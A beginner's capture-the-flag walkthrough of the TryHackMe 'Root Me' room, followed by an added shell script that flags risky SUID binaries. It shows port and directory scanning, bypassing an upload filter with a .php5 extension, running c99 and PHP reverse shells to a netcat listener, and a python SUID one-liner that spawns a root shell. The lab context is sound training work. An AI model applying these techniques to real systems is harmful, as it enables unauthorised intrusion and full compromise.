Having fun with TryHackMe again. Here is my write-up and walkthrough for passing this Root Me challenge.

Room: https://tryhackme.com/room/rrootme
Level: Easy

Task: A CTF for beginners, can you root me?

Let's get started.

Scan the full port range and gather every piece of information available for this machine's IP:

# nmap -A -T4 -sS -sV -p- 10.10.78.111
....
....
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
....
....

There are 2 ports open: 22 and 80. Next, we need to find out whether there is any hidden directory, since there is no hint in the web page source code:

# gobuster dir -u 10.10.78.111 -w wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
....
/uploads (Status: 301) [Size: 314] [--> http://10.10.78.111/uploXXX/]
/css (Status: 301) [Size: 310] [--> http://10.10.78.111/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.78.111/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.78.111/paXXX/]
....
....

There are 2 directories available. Opening the /paXXX path shows the file upload page.

Now let's try to upload a c99 shell.

The file upload blocks files with the .php extension. Let's rename it to .php5 and see if the upload allows it.

Alrighty, it's uploaded. Open the /uploXXX page to check whether the file was uploaded there.

The file is indeed uploaded here. Let's open it.

C99 shell is now running. Time to hunt the flag. Go through the shell. Found the user flag 😬

Let’s continue the hunt.

find / -type f -perm -04000 -ls

This gives a list of SUID files. Refer to GTFOBins to see which one can be used for execution; it looks like /usr/bin/python is the one. The c99 shell is unable to run a Python script here, so I need to use a reverse shell. Since file upload is available, I upload a PHP reverse shell file.

Run a netcat listener and open http://10.10.X.X/uploads/php-reverse-shell.php5

# nc -l -n -v -p 1234
Connection from 10.10.X.X:56058
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:51:30 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Now we have access to a terminal. From GTFOBins, follow the sudo command:

$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
ls /root
root.txt
cat /root/root.txt

Done! Found the final flag!
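The last step worked because /usr/bin/python carried the SUID bit. As an added example (not part of the original write-up), the script below filters a list of SUID paths, such as the output of the find command used earlier, for shells and interpreters that should not be SUID. The RISKY_NAMES list, the function names and the sample paths are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are shells or script interpreters.
# RISKY_NAMES is an illustrative assumption, not a complete inventory.
RISKY_NAMES="python perl ruby php lua node bash sh dash zsh ksh awk gawk vim vi nano find env"

# Strip the directory and a trailing version suffix: /usr/bin/python2.7 -> python
base_name() {
    basename "$1" | sed -E 's/[0-9]+(\.[0-9]+)*$//'
}

# Read one path per line on stdin; print only the paths whose base name is risky.
flag_risky_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=$(base_name "$path")
        for risky in $RISKY_NAMES; do
            if [ "$name" = "$risky" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Constructed sample of SUID paths (not output captured from the room).
sample_suid_list() {
    cat <<'EOF'
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/python
/bin/mount
/usr/bin/python2.7
/bin/su
EOF
}

# On a real host, replace the sample with:
#   find / -xdev -type f -perm -4000 2>/dev/null | flag_risky_suid
sample_suid_list | flag_risky_suid
```

Anything the script reports should have the bit cleared with chmod u-s unless there is a documented reason for it.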

Software Engineer at Teratotech.com
